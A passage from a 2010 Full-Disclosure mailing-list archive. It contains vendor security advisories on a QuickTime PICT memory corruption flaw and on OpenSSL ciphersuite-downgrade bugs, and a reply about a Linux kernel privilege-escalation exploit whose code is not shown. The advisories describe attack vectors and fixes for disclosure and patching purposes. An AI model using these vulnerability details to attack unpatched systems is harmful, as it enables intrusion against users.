2010-12-07 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Moritz Jodeit of n.runs AG -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iDefense Security Advisory 12.07.10: Apple QuickTime PICT Memory Corruption Vulnerability
iDefense Security Advisory 12.07.10 http://labs.idefense.com/intelligence/vulnerabilities/ Dec 07, 2010 I. BACKGROUND QuickTime is Apple's media player product used to render video and other media. The PICT file format was developed by Apple Inc. in 1984. PICT files can contain both object-oriented images and bitmaps. For more information visit http://www.apple.com/quicktime/ II. DESCRIPTION Remote exploitation of a memory corruption vulnerability in Apple Inc.'s QuickTime media player could allow attackers to execute arbitrary code in the context of the targeted user. The vulnerability specifically exists in the way specially crafted PICT image files are handled by the QuickTime PictureViewer. When processing specially crafted PICT image files, Quicktime PictureViewer uses a set value from the file to control the length of a byte swap operation. The byte swap operation is used to convert big endian data to little endian data. QuickTime fails to validate the length value properly before using it. When a length value is larger than the actual buffer size supplied, it will corrupt heap memory beyond the allocated buffer, which could lead to an exploitable condition. III. ANALYSIS Successful exploitation could allow attackers to execute arbitrary code in the context of the current user. To exploit this vulnerability, an attacker must persuade a victim into using QuickTime to open a specially crafted PICT picture file. This could be accomplished by either direct link or referenced from a website under the attacker's control. An attacker could host a Web page containing a malformed PICT file. Upon visiting the malicious Web page exploitation would occur and execution of arbitrary code would be possible. Alternatively a PICT file could be attached within an e-mail file. IV. DETECTION QuickTime Player versions prior to 7.6.9 are vulnerable. V. WORKAROUND iDefense recommends disabling the QuickTime Plugin and altering the .pct, .pic and .pict filetype associations within the registry. Disabling the plugin will prevent Web browsers from utilizing QuickTime Player to view associated media files. Removing the filetype associations within the registry will prevent QuickTime Player and Picture Viewer from opening .pct, .pic and .pict files. VI. VENDOR RESPONSE Apple Inc. has released patches which addresses this issue. For more information, consult their advisory at the following URL: http://support.apple.com/kb/HT4447 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2010-3800 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 03/31/2010 Initial Vendor Notification 03/31/2010 Initial Vendor Reply 12/07/2010 Coordinated Public Disclosure IX. CREDIT This vulnerability was reported to iDefense by Hossein Lotfi (s0lute). Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2010 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerserv...@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-1029-1] OpenSSL vulnerabilities
=== Ubuntu Security Notice USN-1029-1 December 08, 2010 openssl vulnerabilities CVE-2008-7270, CVE-2010-4180 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 9.10 Ubuntu 10.04 LTS Ubuntu 10.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libssl0.9.8 0.9.8a-7ubuntu0.14 Ubuntu 8.04 LTS: libssl0.9.8 0.9.8g-4ubuntu3.13 Ubuntu 9.10: libssl0.9.8 0.9.8g-16ubuntu3.5 Ubuntu 10.04 LTS: libssl0.9.8 0.9.8k-7ubuntu8.5 Ubuntu 10.10: libssl0.9.8 0.9.8o-1ubuntu4.3 After a standard system update you need to reboot your computer to make all the necessary changes. Details follow: It was discovered that an old bug workaround in the SSL/TLS server code allowed an attacker to modify the stored session cache ciphersuite. This could possibly allow an attacker to downgrade the ciphersuite to a weaker one on subsequent connections. (CVE-2010-4180) It was discovered that an old bug workaround in the SSL/TLS server code allowed allowed an attacker to modify the stored session cache ciphersuite. An attacker could possibly take advantage of this to force the use of a disabled cipher. This vulnerability only affects the versions of OpenSSL in Ubuntu 6.06 LTS, Ubuntu 8.04 LTS, and Ubuntu 9.10. (CVE-2008-7270) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.14.diff.gz Size/MD5:67296 3de8e480bcec0653b94001366e2f1f27 http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.14.dsc Size/MD5: 1465 a5f93020840f693044eb64af528fd01e http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a.orig.tar.gz Size/MD5: 3271435 1d16c727c10185e4d694f87f5e424ee1 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8a-7ubuntu0.14_amd64.udeb Size/MD5: 572012 b3792d19d5f7783929e473b6eb1e239c http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8a-7ubuntu0.14_amd64.deb Size/MD5: 2181644 746b74e9b6c42731ff2021c396789708 http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8a-7ubuntu0.14_amd64.deb Size/MD5: 1696628 abe942986698bf86938312c5e344e0ba http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8a-7ubuntu0.14_amd64.deb Size/MD5: 880292 9d6d854dcef14c90ce24c1aa232a418a http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.14_amd64.deb Size/MD5: 998466 9c51c334fd6c0b7c7b73340a01af61c8 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8a-7ubuntu0.14_i386.udeb Size/MD5: 509644 e1617d062d546f7dad2298bf6463bc3c http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8a-7ubuntu0.14_i386.deb Size/MD5: 2031000 6755c67294ab2ff03255a3bf7079ab26 http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8a-7ubuntu0.14_i386.deb Size/MD5: 5195206 37fcd0cdefd012f0ea7d79d0e6a1b48f http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8a-7ubuntu0.14_i386.deb Size/MD5: 2660326 9083ddc71b89e4f4e95c4ca999bcedba http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.14_i386.deb Size/MD5: 979408 518eaad303d089ab7dcc1b89fd019f19 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8a-7ubuntu0.14_powerpc.udeb Size/MD5: 558018 0e94d5f570a83f4b41bef642e032c256 http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8a-7ubuntu0.14_powerpc.deb Size/MD5: 2189034 6588292725cfa33c8d56a61c3d8120b1 http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8a-7ubuntu0.14_powerpc.deb Size/MD5: 1740524 0b98e950e59c538333716ee939710150 http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8a-7ubuntu0.14_powerpc.deb Size/MD5: 865778 d1e44ecc73dea8a8a11cd4d6b7c38abf http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.14_powerpc.deb Size/MD5: 984342 a3ff875c30b6721a1d6dd59d9a6393e0 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8a-7ubuntu0.14_sparc.udeb Size/MD5: 531126 7f598ce48b981eece01e0a1044bbdcc5 http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8a-7u
Re: [Full-disclosure] Linux kernel exploit
Why gcc exp.c -o exp alert "Error: too many Argument"? I test it in Linux 2.6.X. 2010/12/7 coderman > On Tue, Dec 7, 2010 at 12:25 PM, Dan Rosenberg > wrote: > > ... I've included here a proof-of-concept local privilege escalation > exploit... > > * This exploit leverages three vulnerabilities to get root, all of which > were > > * discovered by Nelson Elhage: > >... > > * However, the important issue, CVE-2010-4258, affects everyone, and it > would > > * be trivial to find an unpatched DoS under KERNEL_DS and write a > slightly > > * more sophisticated version of this... > > nice :) > > clearly demonstrates why risk is complicated and seemingly minor > defects (worth delaying patches for weeks/months? ;) can combine into > truly ugly vulnerabilities... > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
